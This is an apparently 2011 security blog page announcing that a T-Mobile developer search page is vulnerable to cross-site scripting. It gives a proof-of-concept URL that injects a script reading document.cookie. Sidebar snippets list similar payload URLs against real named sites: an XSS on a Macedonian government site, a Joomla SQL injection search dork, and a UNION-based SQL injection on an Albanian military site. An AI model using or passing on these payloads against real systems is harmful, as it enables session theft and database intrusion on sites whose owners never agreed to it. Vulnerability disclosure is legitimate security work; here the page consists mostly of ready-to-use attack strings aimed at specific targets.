Follow me Subscribe RSS

Zer0-0ne

“I have no special talents. I am only passionately curious.”A.Einstein

Home
Computer Search Engine
Web-Sniffer
Web-Tools
Binary Translator
Malware Scanner
XSSdb

Tuesday, February 1, 2011

t-mobile.com XSS VULNERABLE

0

in

T-mobile website vulnerable to cross-site scripting XSS

Proof of concept:
http://developer.t-mobile.com/util/SearchCMS.do?criteria=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=21&y=3

Found by:darknessn1k0!a

Email This BlogThis! Share to X Share to Facebook

Newer Post Older Post Home

0 comments:

Post a Comment

About Me

За Zer0-0ne: Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

View my complete profile

Blog Archive

Popular Posts

ednevnik.mon.gov.mk XSS vulnerable

Ednevnik.mon.gov.mk is vulnerable to xss cross site scripting xss. Poc: http://ednevnik.mon.gov.mk/?s=%22/%3E%3Cscript%3Ealert(/xss/)%3C/scr...
Joomla Component (com_eventList) Remote Blind SQL Injection Vulnerability

# Title : Joomla Component EventList # Dork : intext:"Event List 0.8 Alpha by schlu.net " # DorkEx : http://www.google.com.tr/sea...
Alcatel-mobilephones XSS Vulnerable

#Title: Alcatel-mobilephones XSS Vulnerable #Risk: (4/5) #Release Date: 30.09.2010 #Vulnerability discovered by: darknessn1k0!a http://www.a...
gov.mk Vulnerability sites

Се решив да ги проверам нашите македонски владни сајтови колку се безбедни и ранливи, па бидејки веке подолго време никој ништо не превзема ...
gs.mil.al (Army Forces of Albania) SQL INJECTION VULNERABILITY

POC: http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,@@version,5,6-- http://www.gs.mil.al/galeri_info.php?idr=&i...

Categories

M (1)

page hit counter

Featured Posts

Copyright © 2011 Zer0-0ne | Powered by Blogger

Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting